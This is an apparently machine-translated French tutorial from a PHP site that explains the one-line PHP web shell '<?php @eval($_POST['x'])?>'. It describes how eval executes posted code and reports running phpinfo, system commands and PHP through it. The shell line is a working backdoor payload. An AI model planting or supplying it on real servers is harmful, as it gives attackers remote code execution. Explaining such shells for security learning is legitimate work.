Maison  >  Article  >  développement back-end  >  Comment analyser un cheval de Troie image en une phrase en PHP

Comment analyser un cheval de Troie image en une phrase en PHP

王林
王林original
2019-09-16 17:58:569334parcourir

Comment analyser un cheval de Troie image en une phrase en PHP

Analyse des chevaux de Troie de phrase

Tout d'abord, lors de l'apprentissage de la pénétration, il existe probablement trois types de chevaux de Troie : les gros chevaux, les petits chevaux et une phrase.

Mots courants :

<?php @eval($_POST[&#39;x&#39;])?>

Cela devrait être le plus courant... regardez sa composition.

La première est une fonction d'évaluation, suivie en soumettant une valeur avec le paramètre x. Tout d'abord, regardons ce que fait la fonction eval.

Description officielle :

La fonction eval() calcule la chaîne selon le code PHP.

La chaîne doit être du code PHP valide et doit se terminer par un point-virgule.

Si aucune instruction return n'est appelée dans la chaîne de code, NULL est renvoyé. S'il y a des erreurs d'analyse dans le code, la fonction eval() renvoie false.

Syntaxe :

eval(phpcode)

Pour faire simple, il peut exécuter certaines fonctions php et du code php.
De cette façon, nous pouvons le comprendre. beaucoup plus simple. Ne serait-il pas préférable de lui poster directement du code PHP ?
Par exemple : fonction phpinfo(), fonction système, etc.

Comment analyser un cheval de Troie image en une phrase en PHP

Vous pouvez voir que la fonction phpinfo que j'ai ici a été exécutée.

L'exécution des commandes est également possible

Comment analyser un cheval de Troie image en une phrase en PHP

Le code PHP peut également être exécuté en douceur :

Comment analyser un cheval de Troie image en une phrase en PHP

Recommandé Tutoriel vidéo : Tutoriel vidéo PHP

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Déclaration:
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn